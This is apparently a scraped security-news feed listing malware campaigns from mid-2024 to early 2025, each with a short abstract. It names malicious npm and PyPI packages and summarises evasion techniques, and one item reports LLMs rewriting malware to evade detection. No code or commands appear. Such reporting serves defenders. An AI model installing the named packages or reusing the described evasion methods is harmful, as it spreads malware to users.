Following its removal from the Chrome Web Store due to the use of Manifest v2, the legitimate extension was replaced by a malicious one called 'EditThisCookie®', using Manifest v3.Security Online
January 4, 2025
New Stealthy Malware Leveraging SSH Over TOR Attacking Ukrainian Military Full Text
Abstract
Researchers recently discovered a malicious campaign targeting Ukrainian military personnel through fake “Army+” app websites, which host a malicious installer that, upon execution, extracts the legitimate app alongside the Tor browser.GBHackers
January 3, 2025
New FireScam Information Stealer Comes with Spyware Capabilities Full Text
Abstract
FireScam monitors device activities such as screen state changes, e-commerce transactions, clipboard activity, and user engagement to gather valuable information covertly.Cyfirma
January 2, 2025
Advancing Through the Cyberfront, LegionLoader Commander Full Text
Abstract
LegionLoader is a downloader malware written in C/C++ that first appeared in the wild in 2019. It is also known by other names, including Satacom and RobotDropper, and is tracked as CurlyGate by Mandiant.TRAC Labs
January 2, 2025
Malicious Obfuscated NPM Package Disguised as an Ethereum Tool Deploys Quasar RAT Full Text
Abstract
The heavily obfuscated package, named ethereumvulncontracthandler, was published to npm on December 18, 2024, by a user named "solidit-dev-416." As of writing, it continues to be available for download. It has been downloaded 66 times to date.The Hacker News
January 2, 2025
New NGate Trojan Drains Bank Accounts via NFC-based ATM Withdrawls Full Text
Abstract
The NGate trojan relays data from the compromised device's NFC chip, allowing the attacker to withdraw money from the victim's accounts at ATMs without the victim’s involvement.Security Online
December 27, 2024
New ‘OtterCookie’ Malware Used to Backdoor Developers in Fake Job Offers Full Text
Abstract
A report from NTT Security Japan found that the Contagious Interview operation is now using a new piece of malware called OtterCookie, which was likely introduced in September and with a new variant appearing in the wild in November.Cyware
December 27, 2024
AI Could Generate 10,000 Malware Variants, Evading Detection in 88% of Case Full Text
Abstract
Unit 42 used LLMs to rewrite malware samples, bypassing detection by ML models like Innocent Until Proven Guilty (IUPG) and PhishingJS, creating 10,000 functional JavaScript variants without altering the functionality.Cyware
December 24, 2024
Malicious Intent Discovered in Two PyPI Packages Full Text
Abstract
Fortinet flagged two malicious Python packages, Zebo-0.1.0 and Cometlogger-0.1, exhibiting behaviors like keylogging, data exfiltration, webhook injection, and anti-VM checks while employing obfuscation to evade detection.Fortinet
December 21, 2024
Malicious Microsoft VSCode Extensions Target Developers, Crypto Community Full Text
Abstract
Malicious Visual Studio Code extensions were discovered on the VSCode marketplace that download heavily obfuscated PowerShell payloads to target developers and cryptocurrency projects in supply chain attacks.Bleeping Computer
December 18, 2024
CoinLurker Stealer Infects Users Through Fake Software Update Prompts Full Text
Abstract
"Written in Go, CoinLurker employs cutting-edge obfuscation and anti-analysis techniques, making it a highly effective tool in modern cyber attacks," Morphisec researcher Nadav Lorber said in a technical report published Monday.Morphisec
December 18, 2024
Technical Analysis of RiseLoader Reveals Similarities with RisePro’s Communication Protocol Full Text
Abstract
RiseLoader is a new malware loader family that was first observed in October 2024. The malware implements a custom TCP-based binary network protocol that is similar to RisePro.ZScalar
December 18, 2024
Threat Actors Exploit Brand Collaborations to Target Popular YouTube Channels Full Text
Abstract
The malware, disguised as legitimate documents like contracts or promotional materials, is often delivered through password-protected files hosted on platforms such as OneDrive to evade detection.CloudDesk
December 18, 2024
New Android NoviSpy Spyware Linked to Qualcomm Zero-Day Bugs Full Text
Abstract
One of the Qualcomm flaws linked to the attacks is CVE-2024-43047, which was marked as an actively exploited zero-day vulnerability by Google Project Zero in October 2024 and received a fix on Android in November.Bleeping Computer
December 14, 2024
New Linux Rootkit PUMAKIT Uses Advanced Stealth Techniques to Evade Detection Full Text
Abstract
Cybersecurity researchers have uncovered a new Linux rootkit called PUMAKIT that comes with capabilities to escalate privileges, hide files and directories, and conceal itself from system tools, while simultaneously evading detection.The Hacker News
December 14, 2024
New IOCONTROL malware used in critical infrastructure attacks Full Text
Abstract
The malware's modular nature makes it capable of compromising a broad spectrum of devices from various manufacturers, including D-Link, Hikvision, Baicells, Red Lion, Orpak, Phoenix Contact, Teltonika, and Unitronics.Bleeping Computer
December 11, 2024
MoqHao Leverages iCloud and VK in Campaign Targeting Apple IDs and Android Device Full Text
Abstract
MoqHao, also known as Wroba and XLoader, is a mobile malware family linked to Roaming Mantis, a cybercrime group believed to be operating out of China. Malicious payloads are usually delivered through SMS phishing attacks targeting mobile devices.Hunt
December 7, 2024
MOONSHINE Exploit Kit and DarkNimbus Backdoor Enabling Earth Minotaur’s Multi-Platform Attacks Full Text
Abstract
Earth Minotaur uses the MOONSHINE exploit kit to deliver the DarkNimbus backdoor to Android and Windows devices, targeting WeChat, and possibly making it a cross-platform threat.Trend Micro
December 7, 2024
Crypto-Stealing Malware Posing as a Meeting App Targets Web3 Professionals Full Text
Abstract
Cybercriminals are targeting people working in Web3 with fake business meetings using a fraudulent video conferencing platform that infects Windows and Macs with crypto-stealing malware.Bleeping Computer
December 5, 2024
Beware of Celestial Stealer: New MaaS Targets Browsers and Crypto Wallets Full Text
Abstract
Celestial Stealer operates as a MaaS offering marketed on Telegram, with subscription plans available on a weekly, monthly, or lifetime basis. It is primarily designed for Windows 10 and 11.Security Online
December 5, 2024
New Andromeda/Gamarue Command-and-Control Cluster Targets APAC Industries Full Text
Abstract
In a recent report, the Cybereason Security Services Team unveiled the discovery of a new cluster of Command-and-Control (C2) servers linked to the infamous Andromeda (aka Gamarue) malware family.Security Online
December 4, 2024
ElizaRAT: Enhancing C2 Communication Through Google, Telegram, & Slack Services Full Text
Abstract
Once executed, the malware extracts sensitive information from Userinfo.dll and transmits it to a remote server, which periodically checks for new instructions, enabling remote control over the compromised system.GBHackers
December 3, 2024
Gafgyt Malware Broadens its Scope in Recent Attacks Full Text
Abstract
Gafgyt primarily targets vulnerable IoT devices, but Trend Micro researchers recently observed this malware being used to attack Docker Remote API servers, signifying a notable shift in its behavior.Trend Micro
December 3, 2024
New Malware Families RevC2 and Venom Loader Spread vis MaaS Tools Full Text
Abstract
“RevC2 uses WebSockets to communicate with its command-and-control (C2) server. The malware is capable of stealing cookies and passwords, proxies network traffic, and enables remote code execution (RCE),” noted ThreatLabz.ZSCaler
December 2, 2024
Fake Betting Apps Using AI-Generated Voices to Steal Data Full Text
Abstract
Cybercriminals are creating fake betting app ads to lure users and steal money and personal information. Over 500 fake ads and 1,377 malicious sites have been identified, targeting users in regions like Egypt, the Middle East, Europe, and Asia.Hack Read
November 29, 2024
SMOKEDHAM Backdoor: UNC2465’s Stealth Weapon for Extortion and Ransomware Campaigns Full Text
Abstract
Once embedded, SMOKEDHAM grants attackers initial access to a target’s system, paving the way for network reconnaissance, lateral movement, and, eventually, ransomware deployment.Security Online
November 28, 2024
What’s up India? PixPirate is back and spreading via WhatsApp Full Text
Abstract
A new iteration of the PixPirate malware has been detected , marking the resurgence of a highly sophisticated threat. The malware is known for targeting financial services and now leverages WhatsApp as a primary vector for its propagation.Security Intelligence
November 23, 2024
Faux ChatGPT, Claude API Packages Deliver JarkaStealer Full Text
Abstract
Two Python packages posing as tools to integrate with popular chatbots and provide API access are actually delivering "JarkaStealer," an infostealer designed to target potentially thousands of victims.Dark Reading
November 23, 2024
Hackers Use Telegram Channels To Deliver Lumma Stealer Sophisticatedly Full Text
Abstract
Lumma Stealer, a sophisticated information-stealing malware, is spreading through Telegram channels, exploiting the platform’s popularity to bypass traditional security measures and target unsuspecting users, potentially compromising sensitive data.GBHackers
November 22, 2024
Unraveling Raspberry Robin’s Layers: Analyzing Obfuscation Techniques and Core Mechanisms Full Text
Abstract
Raspberry Robin, a stealthy malware discovered in 2021, leverages advanced obfuscation techniques to evade detection and analysis by infiltrating systems primarily via USB drives, utilizing TOR network for covert communication with its C2 servers.ZScalar
November 21, 2024
Unveiling WolfsBane: Gelsemium’s Linux counterpart to Gelsevirine Full Text
Abstract
The first backdoor, WolfsBane, is a Linux version of Gelsevirine, a Windows backdoor used by Gelsemium. WolfsBane is a Linux equivalent of Gelsemium’s Gelsevirine backdoor and the WolfsBane dropper is analogous to the Gelsemine dropper.WeLiveSecurity
November 19, 2024
FrostyGoop’s Zoom-In: A Closer Look into the Malware Artifacts, Behaviors and Network Communications Full Text
Abstract
FrostyGoop is the ninth reported OT-centric malware, but the first that used Modbus TCP communications to impact the power supply to heating services for over 600 apartment buildings.Palo Alto Networks
November 16, 2024
New Glove Stealer Malware Bypasses Chrome’s Cookie Encryption Full Text
Abstract
The new malware named Glove Stealer can get around Google Chrome's App-Bound encryption to steal browser cookies. Security researchers found this malware during a phishing campaign and noted that it is still in the early stages of development.Bleeping Computer
November 13, 2024
‘GoIssue’ Cybercrime Tool Targets GitHub Developers for Bulk Credential Theft Full Text
Abstract
A cybercrime tool called GoIssue is being sold for $700 on a forum. It helps cyberattackers steal email addresses from GitHub profiles to use for further attacks like malware delivery and data breaches.Dark Reading
November 13, 2024
Unmasking the SEO Poisoning and Malware Networks Behind Fake E-Commerce Sites Full Text
Abstract
A study by Trend Micro, Japanese authorities, and universities exposed a network of SEO malware families behind fake e-commerce scams targeting Japanese users. Nearly 50,000 fake e-commerce sites were reported in 2023.Security Online
November 12, 2024
New Node.js-based Wish Stealer Targets Discord, Browsers, and Cryptocurrency Wallets Full Text
Abstract
CYFIRMA recently discovered a new malware called “Wish Stealer” that targets Windows users by stealing sensitive information from various sources like Discord, web browsers, cryptocurrency wallets, and social media accounts.Cyfirma
November 12, 2024
Evasive ZIP File Concatenation Used to Deploy Trojan Targeting Windows Users Full Text
Abstract
According to Perception Point, hackers are increasingly using a technique called ZIP file concatenation to hide malicious payloads in compressed archives in a way that security solutions might miss.Perception Point
November 12, 2024
Industrial Companies in Europe Targeted with GuLoader Full Text
Abstract
The malware employs memory injection techniques to execute malicious payloads without writing files to the disk, evading antivirus software. It includes anti-debugging tools to hinder analysis and injects shellcode into legitimate Windows processes.Help Net Security
November 9, 2024
GodFather Malware Now Targets More Than 500 Banking and Crypto Apps Full Text
Abstract
The GodFather malware has now expanded to target over 500 banking and cryptocurrency applications globally, using sophisticated tactics like phishing sites and native code implementation to evade detection.Security Online
November 7, 2024
Recent Keylogger Malware Attributed to North Korean Group Andariel Full Text
Abstract
Known for targeted cyber espionage, Andariel has utilized this keylogger in attacks on U.S. organizations to gather sensitive information through keystroke and mouse logging.Hybrid Analysis
November 6, 2024
GOOTLOADER Malware Continues to Evolve: Google Researchers Uncover Advanced Tactics Full Text
Abstract
Google researchers recently analyzed GOOTLOADER, a JavaScript downloader used by cybercriminals for ransomware attacks and data exfiltration. This malware is distributed through compromised websites, targeting victims via SEO poisoning.Security Online
November 5, 2024
Custom “Pygmy Goat” Malware Used in Sophos Firewall Hack on Government Network Full Text
Abstract
The UK's National Cyber Security Centre (NCSC) has analyzed a Linux malware called "Pygmy Goat" that was developed to create backdoors in Sophos XG firewall devices as part of recent attacks by Chinese threat actors.Bleeping Computer
November 5, 2024
HookBot Uses Advanced Techniques Beyond Keylogging for Data Theft Full Text
Abstract
Netcraft's recent study highlighted HookBot, an advanced Android banking trojan discovered in 2023, that uses overlay attacks, keylogging, and SMS interception to steal sensitive information like banking credentials and passwords.Security Online
November 5, 2024
Beware of chalk-node: Malicious Package Steals Developer Data Full Text
Abstract
A malicious package called “chalk-node” is pretending to be the legitimate “chalk” library. This imposter package contains a script that steals sensitive data from victims' computers and sends it to external servers.Security Online
November 4, 2024
New LightSpy Spyware Version Targets iPhones with Increased Surveillance Tactics Full Text
Abstract
Cybersecurity researchers have identified an enhanced version of an Apple iOS spyware known as LightSpy, which not only improves its functionalities but also adds destructive capabilities to prevent a compromised device from booting up.Cyware
November 1, 2024
Malvertising Campaign Hijacks Facebook Accounts to Spread SYS01stealer Malware Full Text
Abstract
The malware is distributed through malvertising on platforms like Facebook, YouTube, and LinkedIn, targeting men aged 45 and above with enticing ads to steal browser data. Victims are lured to deceptive sites impersonating legitimate brands.The Hacker News
November 1, 2024
Android Malware FakeCall Now Reroutes Bank Calls to Attackers Full Text
Abstract
Beyond voice phishing, FakeCall can capture live audio and video streams from compromised devices without user interaction. The new variant manipulates outgoing calls by setting itself as the default call handler, intercepting and redirecting calls.Bleeping Computer
October 23, 2024
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA Full Text
Abstract
The malware's execution relies on legitimate tools like PowerShell and mshta.exe. Once the fake CAPTCHA is clicked, a Base64-encoded PowerShell script is copied to the clipboard, triggering the download of a stager file.Qualys
October 23, 2024
Early Cascade Injection Technique Enables Windows Process Creation and Stealthy Injection Full Text
Abstract
Researcher Guido Miggelenbrink from Outflank has introduced a new process injection method called Early Cascade Injection. This technique adds sophistication to evading Endpoint Detection and Response (EDR) systems, challenging even top-tier EDRs.Outflank
October 23, 2024
VOIDMAW: A New Bypass Technique for Memory Scanners Full Text
Abstract
VOIDMAW is an innovative memory scanning bypass technique utilized by attackers to evade antivirus software. It can run non-. NET executables and supports multithreaded payloads, making it a potent tool for attackers.Security Online
October 23, 2024
Fake WordPress Plugins on 6,000 Sites Prompt Users to Install Malware Full Text
Abstract
The malware campaign is based on ClickFix fake browser update malware and has infected over 6,000 sites since June 2024, totaling over 25,000 sites since August 2023. The hackers are using stolen credentials to install the bogus plugins.The Cyber Express
October 23, 2024
Researchers Report Possible Bumblebee Loader Resurgence Full Text
Abstract
The Bumblebee loader resurfaced following the disruption of Operation Endgame in May 2024. Netskope Threat Labs identified a new infection chain employing Bumblebee malware, marking its return since the operation that targeted major malware botnets.Infosecurity Magazine
October 22, 2024
GHOSTPULSE Employs New Pixel-Level Deception to Hide in PNG Files Full Text
Abstract
Elastic Security Labs has discovered a significant development in the GHOSTPULSE malware family, which now hides its payload within the pixel structure of PNG files to evade detection.Cyware
October 16, 2024
Hijack Loader Found Abusing Genuine Code-Signing Certificates Full Text
Abstract
Cybersecurity researchers have unveiled a new malware campaign involving Hijack Loader artifacts signed with legitimate code-signing certificates. HarfangLab detected the attack chains aiming to deploy Lumma, an information stealer.HarFang Lab
October 16, 2024
New Linux Variant of FASTCash Malware Helps Steal Money From ATMs Full Text
Abstract
The new Linux variant was submitted to VirusTotal in June 2023 and can evade standard security tools, enabling the hackers to conduct transactions without detection. Additionally, a new Windows version was submitted in September 2024.Bleeping Computer
October 16, 2024
ErrorFather Campaign Deploys Cerberus Android Banking Trojan to Amplify Cyber Threats Full Text
Abstract
This malware communicates with a Telegram bot and conducts financial fraud through remote attacks, keylogging, and overlay attacks. Despite modifications, ErrorFather is still based on the original Cerberus code.Cyble
October 14, 2024
Technical Analysis of DarkVision RAT Full Text
Abstract
Zscaler ThreatLabz observed DarkVision RAT in a new campaign in July 2024. The attack chain involves shellcode decryption, a Donut loader, and a .NET assembly called PureCrypter.ZScalar
October 12, 2024
Malware by the (Bit)Bucket: Uncovering AsyncRAT Full Text
Abstract
G DATA Security Lab discovered a malware campaign using Bitbucket to deploy AsyncRAT, a remote access trojan. The attackers employed multi-stage attacks to host and distribute malicious payloads, hiding their activities with Base64 encoding.GData
October 11, 2024
Trojan.AutoIt.1443 Hits 28,000 Users via Game Cheats, Office Tool Full Text
Abstract
The malware executes tasks to establish network access with Ncat, manipulates the system registry using IFEO, and controls system functions. It conducts cryptomining using SilentCryptoMiner and steals funds by swapping crypto wallet addresses.HackRead
October 10, 2024
Lua Malware Targeting Student Gamers via Fake Game Cheats Full Text
Abstract
Morphisec Threat Labs has found advanced Lua malware targeting student gamers and educational institutions, taking advantage of Lua-based gaming engine supplements popular among students.HackRead
October 8, 2024
LemonDuck Unleashes Cryptomining Attacks Through SMB Service Exploits Full Text
Abstract
A recent report by security researchers at Aufa and NetbyteSEC reveals the resurgence of the LemonDuck malware, exploiting the EternalBlue vulnerability in Microsoft’s SMB protocol for cryptomining.Net Bytes
October 8, 2024
Threat Actor Believed to be Spreading New Medusalocker Variant Since 2022 Full Text
Abstract
BabyLockerKZ has expanded its reach to different continents, shifting from Europe to South America in early 2023. It has distinct features compared to MedusaLocker, such as unique storage keys and differences between Windows and Linux versions.Talos Intelligence
October 7, 2024
Fake Job Applications Deliver Dangerous More_eggs Malware to HR Professionals Full Text
Abstract
This malware, which can steal credentials from online bank accounts, email accounts, and IT administrator accounts, is attributed to a threat actor group known as Golden Chickens.The Hacker News
October 7, 2024
Python-based Malware Slithers Into Systems via Legit VS Code Full Text
Abstract
Researchers from Cyble Research and Intelligence Lab (CRIL) uncovered the attack, which begins with a malicious email and utilizes Visual Studio Code to distribute Python-based malware, granting unauthorized remote access to infected devices.Dark Reading
October 5, 2024
Fake Trading Apps Target Victims Globally via Apple App Store and Google Play Full Text
Abstract
These apps are part of a consumer investment fraud scheme known as pig butchering, where victims are tricked into investing in cryptocurrency or other financial instruments under false pretenses.The Hacker News
October 3, 2024
PyPI Repository Found Hosting Fake Crypto Wallet Recovery Tools That Steal User Data Full Text
Abstract
The Python Package Index (PyPI) repository was found hosting fake cryptocurrency wallet recovery tools that steal user data, targeting popular wallets like Atomic and Trust Wallet.The Hacker News
September 20, 2024
Hackers Deliver Popular Crypto-Miner Through Malicious Email Auto Replies, Researchers Say Full Text
Abstract
Hackers are distributing a popular crypto-miner via malicious email auto-replies, as per researchers. They compromised email accounts to send innocent automatic replies with links to crypto-mining malware, specifically XMRig.The Record
September 17, 2024
EchoStrike: Generate Undetectable Reverse Shells, Perform Process Injection Full Text
Abstract
EchoStrike features an interactive Python wizard for easy customization, various persistence techniques, binary padding for evasion, AES payload encryption, and dynamic binary download.Help Net Security
September 14, 2024
TrickMo Android Trojan Exploits Accessibility Services for On-Device Banking Fraud Full Text
Abstract
Cybersecurity researchers at Cleafy discovered a new variant of the TrickMo Android banking trojan that evades analysis and displays fake login screens to steal banking credentials.The Hacker News
September 14, 2024
New Android Malware Ajina.Banker Steals 2FA Codes, Spreads via Telegram Full Text
Abstract
Discovering the threat in May 2024, Group-IB highlighted that the malware is spread through Telegram channels disguised as legitimate banking and government service applications.HackRead
September 14, 2024
New Vo1d Malware Infects 1.3 Million Android Streaming Boxes Full Text
Abstract
The Vo1d malware campaign targets specific Android firmware versions like Android 7.1.2 and Android 10.1. The malware modifies system files to launch itself on boot and persist on the device.Bleeping Computer
September 10, 2024
Predator Spyware Roars Back with New Infrastructure, Evasive Tactics Full Text
Abstract
Researchers have warned of the resurgence of Predator spyware, previously thought to be inactive due to sanctions and exposure, thanks to new infrastructure and evasive tactics.Security Online
September 10, 2024
Spyware Vendors’ Nebulous Ecosystem Helps Them Evade Sanctions Full Text
Abstract
Spyware vendors have developed a complex ecosystem that enables them to evade sanctions effectively by utilizing a network of interconnected entities across various jurisdictions.Infosecurity Magazine
September 4, 2024
Earth Lusca Uses KTLVdoor Backdoor for Multiplatform Intrusion Full Text
Abstract
The highly obfuscated KTLVdoor malware has versions for both Microsoft Windows and Linux, allowing attackers to perform tasks like file manipulation, command execution, and remote port scanning.Trend Micro
September 4, 2024
Emansrepo Stealer: Multi-Vector Attack Chains Full Text
Abstract
The Python-based infostealer collects user information, text files, PDF files, browser data, crypto wallets, game platforms, browser extensions, and cookies. The stolen data is sent via email to the attacker.Fortinet
August 31, 2024
Rocinante: The Trojan Horse That Wanted to Fly Full Text
Abstract
Once installed, the Rocinante malware prompts the victim to grant Accessibility Services and displays phishing screens tailored to different banks to steal personal information.Threat Fabric
August 31, 2024
Godzilla Fileless Backdoors Targeting Atlassian Confluence Full Text
Abstract
The Godzilla fileless backdoor relies on a complex series of actions, such as cryptographic operations, class loading, and dynamic injection, to establish unauthorized access.Trend Micro
August 13, 2024
Threat Actors Hijacking Websites to Deliver .NET-Based Malware Full Text
Abstract
Cyber threat operation ClearFake distributes fake antivirus software to trick users into believing their systems are infected, leading to requests for payment or installation of more malware.Cybersecurity News
August 7, 2024
North Korean Hackers Leverage Malicious NPM Packages for Initial Access Full Text
Abstract
North Korean hackers, identified as Moonstone Sleet, have been distributing malicious JavaScript packages on the npm registry to infect Windows systems. The two packages, harthat-api and harthat-hash, were uploaded on July 7, 2024.DataDog
August 7, 2024
Chameleon Malware Now Targeting Employees Masquerading as a CRM app Full Text
Abstract
Researchers have revealed a new tactic used by threat actors behind the Chameleon Android banking trojan, targeting Canadian users with a disguised Customer Relationship Management (CRM) app.Threat Fabric
August 6, 2024
Sneaky SnakeKeylogger Slithers Into Windows Email Inboxes Full Text
Abstract
SnakeKeylogger, also known as KrakenKeylogger, is a malicious software targeting Windows users. It logs keystrokes, steals credentials, and takes screenshots, allowing cybercriminals to capture sensitive information.The Register
August 6, 2024
Mint Stealer: New MaaS Malware Threatens Confidential Data Full Text
Abstract
A new MaaS malware known as Mint Stealer has emerged, threatening confidential data. This malware, identified by experts from Cyfirma, is designed to steal a wide range of information by employing advanced encryption and obfuscation techniques.Security Online
August 1, 2024
Telegram-Controlled TgRat Trojan Now Targets Linux Servers Full Text
Abstract
TgRat Trojan, previously targeting Windows, now focuses on Linux, using Telegram to control infected machines. Discovered by Dr. Web, this RAT allows cybercriminals to exfiltrate data and execute commands.Hack Read
July 31, 2024
New Specula Tool Uses Outlook for Remote Code Execution in Windows Full Text
Abstract
TrustedSec released a post-exploitation framework called "Specula", which exploits CVE-2017-11774 to create a custom Outlook Home Page using WebView and execute arbitrary commands on compromised Windows systems.Bleeping Computer
July 31, 2024
Mandrake Spyware Infects 32,000 Devices via Google Play Apps Full Text
Abstract
Initially detected in May 2020 by Bitdefender, Mandrake went undetected for four years. In April 2024, Kaspersky identified a new variant hidden in five Google Play apps from 2022 to 2024.Infosecurity Magazine
July 30, 2024
New PowerShell Backdoor Linked to Zloader Malware Full Text
Abstract
The newly discovered backdoor has limited samples available on VirusTotal, making detection more difficult. It operates by collecting system information and sending it to a command and control server, awaiting further instructions.Infosecurity Magazine
July 29, 2024
Gh0stGambit Dropper Used to Deploy Gh0st RAT Against Chinese Users Full Text
Abstract
The Gh0st RAT Trojan is being distributed to Chinese Windows users through a fake Chrome website. The malware has been around since 2008 and has evolved over the years, often used by cyberespionage groups in China.Esentire
July 29, 2024
Targeted PyPI Package Steals Google Cloud Credentials from macOS Devs Full Text
Abstract
The malware is designed to target only 64 specific machines, attempting to exfiltrate Google Cloud Platform credentials for potential follow-on attacks such as data theft and malware implantation.Dark Reading
July 17, 2024
Fake AWS Packages Ship Command and Control Malware in JPEG Files Full Text
Abstract
The two malicious packages, img-aws-s3-object-multipart-copy and legacyaws-s3-object-multipart-copy, were downloaded 190 and 48 times, respectively, before being removed by npm security.Phylum
July 12, 2024
Exploring Compiled V8 JavaScript Usage in Malware Full Text
Abstract
Compiled V8 JavaScript in Google's engine converts JavaScript into low-level bytecode, making analysis and detection difficult. Attacks using this bytecode ensure compatibility with the V8 engine for successful execution.CheckPoint
July 10, 2024 – Phishing
Regional Transport Office Themed Phishing Campaign Targets Android Users In India Full Text
Abstract
Phishing messages impersonating the Regional Transport Office have been circulating since 2024, claiming traffic violations and prompting users to download a malicious APK named "VAHAN PARIVAHAN.apk".Cyble As CISOs Grapple with the C-Suite, Job Satisfaction Takes a Hit Full Text
Abstract
Research shows that 75% of CISOs are considering a job change due to various challenges and pressures. CISOs often face accountability for cyber incidents and compliance failures, leading to discontent.Cybersecurity Dive
July 5, 2024
Turla: A Master of Deception Full Text
Abstract
The Turla malware has been found using weaponized LNK files to infect computers. The malware leverages a compromised website to distribute malicious packages through phishing emails.G Data
July 5, 2024
Malicious QR Reader App in Google Play Delivers Anatsa Banking Malware Full Text
Abstract
A malicious QR code reader app on Google Play has been found distributing the Anatsa banking malware, posing a significant threat to users' financial data. The app has already been downloaded thousands of times.Cyber Security News
July 4, 2024
Mekotio Banking Trojan Threatens Financial Systems in Latin America Full Text
Abstract
The Mekotio banking trojan is a highly sophisticated malware that targets Latin American countries, with a focus on stealing banking credentials. It spreads through phishing emails, tricking users into interacting with malicious links or attachments.Trend Micro
July 4, 2024
Infostealer malware logs used to identify child abuse website members Full Text
Abstract
Researchers at Recorded Future's Insikt Group analyzed infostealer malware logs captured between February 2021 and February 2024. They cross-referenced the credentials with 20 known CSAM domains, identifying 3,324 unique username-password pairs.Bleeping Computer
July 2, 2024
New Orcinius Trojan Uses VBA Stomping to Mask Infection Full Text
Abstract
This multi-stage trojan utilizes Dropbox and Google Docs to update and deliver payloads. It uses the VBA stomping technique, removing the VBA source code in a Microsoft Office document, leaving only compiled p-code.SonicWall
July 2, 2024
CapraRAT Spyware Variant Disguised as Popular Apps to Target Android Users Full Text
Abstract
The recent campaign shows updates to the group's techniques and social engineering tactics, as well as efforts to maximize the spyware's compatibility with older and modern versions of the Android operating system.Silicon Angle
June 29, 2024
MerkSpy: Exploiting CVE-2021-40444 to Infiltrate Systems Full Text
Abstract
MerkSpy is designed to covertly monitor user activities, capture sensitive information like keystrokes and Chrome login credentials, and exfiltrate the data to the attacker's server.Fortinet
June 28, 2024
New Unfurling Hemlock Threat Actor Floods Systems with Malware Full Text
Abstract
Unfurling Hemlock is using a new method, referred to as a "malware cluster bomb," which allows the threat actor to use one malware sample to spread additional malware on compromised machines.Bleeping Computer
June 27, 2024
Malicious NPM Package Targets AWS Users to Deploy Backdoor Full Text
Abstract
ReversingLabs researchers discovered a suspicious package on npm called legacyreact-aws-s3-typescript. They found that the package contained a post-install script that downloaded and executed a simple backdoor.Reversing Labs
June 26, 2024
New Medusa Malware Variants Target Android Users in Seven Countries Full Text
Abstract
The Medusa banking trojan (aka TangleBot) operates as a malware-as-a-service, providing keylogging, screen controls, and SMS manipulation. Note that this operation is different from the ransomware gang and the Mirai-based botnet with the same name.Bleeping Computer
June 25, 2024
Android RAT SpyMax Targets Telegram Users Full Text
Abstract
SpyMax does not require the targeted device to be rooted, making it easier for threat actors to cause damage. Once installed, SpyMax gathers personal information from the infected device without user consent and sends it to a remote threat actor.K7 Security
June 22, 2024
Rafel RAT, Android Malware from Espionage to Ransomware Operations Full Text
Abstract
Check Point Research has identified multiple threat actors using Rafel RAT, including an espionage group. The tool's features, such as remote access and surveillance, make it effective for covert operations and infiltrating high-value targets.Check Point
June 20, 2024
Experts Uncover New Evasive SquidLoader Malware Targeting Chinese Organizations Full Text
Abstract
SquidLoader is designed to deliver a second-stage payload, such as Cobalt Strike, and has been active since at least April 2024. The payload is delivered through executables with descriptive Chinese filenames and icons resembling Word documents.The Hacker News
June 20, 2024
New Rust-based Fickle Malware Uses PowerShell for UAC Bypass and Data Exfiltration Full Text
Abstract
Fickle Stealer is being distributed through various attack chains to gather sensitive data from compromised hosts. Four distribution methods have been identified, including VBA dropper, VBA downloader, link downloader, and executable downloader.The Hacker News
June 19, 2024
New Diamorphine Rootkit Variant Seen Undetected in the Wild Full Text
Abstract
Once loaded, the Diamorphine rootkit hides files and folders and allows the threat actor to perform certain operations such as hiding processes, elevating privileges, and interacting with the rootkit.Avast
June 13, 2024
Dissecting SSLoad Malware: A Comprehensive Technical Analysis Full Text
Abstract
SSLoad is a sophisticated malware used for infiltrating systems through phishing emails, gathering reconnaissance data, and transmitting it back to its operators while delivering various payloads.Intezer
June 12, 2024
WarmCookie Gives Cyberattackers New Backdoor for Initial Access Full Text
Abstract
Once downloaded, WarmCookie is loaded using PowerShell and subsequently provides functionality for monitoring victims and deploying more damaging payloads like ransomware.Dark Reading
June 11, 2024
Noodle RAT: Reviewing the New Backdoor Used by Chinese-Speaking Groups Full Text
Abstract
Noodle RAT is a backdoor used by Chinese-speaking groups for cybercrime and espionage. This malware, both its Windows and Linux versions, has existed since 2016 but was misidentified as variants of other malware.Trend Micro
June 11, 2024
Latest Variant of ValleyRAT Delivered via DLL Sideloading and Process Injection Full Text
Abstract
The downloader and loader utilized in the campaign employ various techniques, including anti-virus checks, DLL sideloading, and process injection. The configuration to communicate to the C2 server is identified by a specific marker.ZScalar
June 10, 2024
Malicious VSCode Extensions with Millions of Installs Discovered Full Text
Abstract
Researchers found that the malicious code went undetected by endpoint detection and response (EDR) tools, as VSCode is treated leniently due to its nature as a development and testing system.Bleeping Computer
June 6, 2024
Muhstik Malware Targets Message Queuing Services Applications Full Text
Abstract
A remote code execution vulnerability, CVE-2023-33246, was discovered for RocketMQ versions 5.1.0 and below, allowing attackers to execute commands within the system using the update configuration function.Aqua
June 6, 2024
CarnavalHeist Banking Trojan Targets Brazil with Overlay Attacks Full Text
Abstract
The malware primarily targets Brazilian users, as evidenced by the use of Portuguese throughout the infection chain and the C2 infrastructure exclusively using the BrazilSouth availability zone on Microsoft Azure.PC Risk
June 6, 2024
DarkCrystal RAT Delivered via Signal Messenger Full Text
Abstract
Cybersecurity experts have found that the Signal messenger app is being used to distribute DarkCrystal RAT. This malware is being targeted at high-profile individuals in Ukraine, including government officials and military personnel.Broadcom
June 4, 2024
Sophisticated RAT Targeting Gulp Projects on npm Full Text
Abstract
The NPM package masquerades as a logger for gulp and gulp plugins and has been downloaded 175 times. It contains two obfuscated files that work together to deploy the malicious payload.Phylum
June 4, 2024
New Android Trojan ‘Viper RAT’ Advertised on Dark Web Forums to Steal User Data Full Text
Abstract
The threat actor behind Viper RAT has established a dedicated website and a Telegram account for ordering, adding a level of credibility. The cost of this malicious tool is surprisingly low, suggesting malicious intent.The Cyber Express
June 3, 2024
Fake Bahrain Government Android App Steals Personal Data Used for Financial Fraud Full Text
Abstract
McAfee Mobile Research Team found an Android malware that pretends to be the official app of Bahrain and advertises that users can renew or apply for driver’s licenses, visas, and ID cards on mobile.McAfee
May 31, 2024
Pirated Microsoft Office Delivers Malware Cocktail on Systems Full Text
Abstract
Cybercriminals are distributing a malware cocktail through cracked versions of Microsoft Office promoted on torrent sites. The malware delivered to users includes RATs, cryptocurrency miners, malware downloaders, proxy tools, and anti-AV programs.Bleeping Compute
May 30, 2024
PyPI Crypto-Stealer Targets Windows Users, Revives Malware Campaign Full Text
Abstract
The package, which has been downloaded 264 times, is described as an "API Management tool written in Python" but contains code that downloads and installs trojanized Windows binaries capable of surveillance, achieving persistence, and crypto-theft.SonaType
May 29, 2024
New ATM Malware Family Emerged in the Threat Landscape Full Text
Abstract
